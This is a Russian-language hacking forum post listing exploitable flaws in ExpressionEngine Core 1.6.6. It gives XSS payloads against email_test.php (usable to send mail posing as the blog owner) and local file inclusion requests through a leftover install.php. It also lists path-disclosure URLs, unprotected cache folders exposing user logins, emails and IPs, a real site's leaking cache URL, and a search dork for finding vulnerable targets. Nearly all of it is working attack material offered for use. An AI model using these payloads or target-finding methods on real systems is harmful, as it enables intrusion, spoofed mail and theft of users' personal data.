ExpressionEngine Core v. 1.6.6 и другие версии и модификации вроде бы тоже (пишут, что за бугром популярен)
Алгоритм хеширования:
sha1(pass) - по дефолту, или
md5(pass).
XSS (Кстати, этим скриптом можно отправить кому угодно письмо с уязвимого сервера, с обратным адресом владельца блога):
Код:
POST: http://test1.ru/system/utilities/email_test.php
recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>
При неудалённом install.php:
LFI:
Код:
http://test1.ru/install.php?page=4
system_dir=system&ext=/../../1.php
//Если system_dir не system (по дефолту), то следует изменить на актуальный.
LFI:
Код:
http://test1.ru/install.php?page=5
ext=/../../1.php
LFI:
Код:
http://test1.ru/install.php?page=6
ext=/../../1.php
LFI:
Код:
http://test1.ru/install.php?page=7
rebuild_config=1&ext=/../../1.php
Раскрытие путей :
Код:
http://test1.ru/system/utilities/admin.php
http://test1.ru/system/utilities/dbtest.php
Раскрытие путей (при register_globals=
ON):
Код:
http://test1.ru/system/update.php?conf=1
Раскрытие информации о пользователях, префикса таблиц БД, ip адресов юзеров(да и не только):
Папки не спрятаны .htaccess'ом, в диком интернете в db_cache можно найти интересную информацию:
Код:
/system/cache/sql_cache/
/system/cache/db_cache/
/system/cache/magpie_cache/
/system/cache/page_cache/
/system/cache/tag_cache/
Например: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (информация о пользователях логин, мыло и т.п.)
dork: "powered by ExpressionEngine" (кстати, действительно, довольно много)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог:
http://qwazar.ru/.